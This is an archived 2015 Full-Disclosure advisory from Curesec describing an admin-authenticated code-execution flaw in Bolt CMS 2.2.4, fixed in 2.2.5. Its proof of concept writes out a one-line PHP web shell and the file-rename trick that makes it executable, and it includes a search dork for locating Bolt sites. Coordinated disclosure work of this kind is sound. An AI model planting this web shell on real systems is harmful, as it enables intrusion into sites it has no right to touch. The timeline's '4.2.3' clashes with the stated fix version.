lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <55D2F81F.3060807@curesec.com>
Date: Tue, 18 Aug 2015 11:17:19 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Bolt 2.2.4 - Code Execution

Bolt 2.2.4: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: 	Bolt 2.2.4	
Fixed in: 	2.2.5
Fixed Version Link: 	http://bolt.cm/distribution/archive/bolt-2.2.5.zip	
Vendor Contact: 	Website: https://bolt.cm	
Vulnerability Type: 	Code Execution	
Remote Exploitable: 	Yes	
Reported to vendor: 	07/14/2015	
Disclosed to public: 	08/17/2015	
Release mode: 	Coordinated release	
CVE: 	n/a	
Google Dork: 	"This website is Built with Bolt" (About 11,100 results)	
Credits 	Tim Coen of Curesec GmbH	

2. Vulnerability Description

The Bolt CMS does not allow the upload or editing of PHP files in its
admin area, which should prevent code execution once an attacker gained
admin credentials.

However, when uploading, the actual file type is not checked. The theme
editor allows for the renaming of uploaded files, and it does not check
the file extension or file type when doing so. Because of this, an
attacker can gain code execution.

Please note that admin credentials are required.

3. Proof of Concept

    Visit theme editor:
http://localhost/bolt-git-2015-06-25-05c29bf/bolt/files/theme/base-2014
    Upload or edit any existing file with allowed extension to contain
<?php passthru($_GET['e']);
    Rename the file, giving it an extension that will make it
executable, eg .php

The file will not be shown in the theme editor anymore, because PHP
files are not shown, but it will be accessible via eg
http://localhost/bolt-git-2015-06-25-05c29bf/theme/base-2014/README.php

4. Solution

To mitigate this issue please upgrade at least to version 2.2.5:

http://bolt.cm/distribution/archive/bolt-2.2.5.zip

Please note that a newer version might already be available.

5. Report Timeline

07/14/2015 	Informed Vendor about Issue
07/24/2015 	Vendor releases Version 4.2.3
08/17/2015 	Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ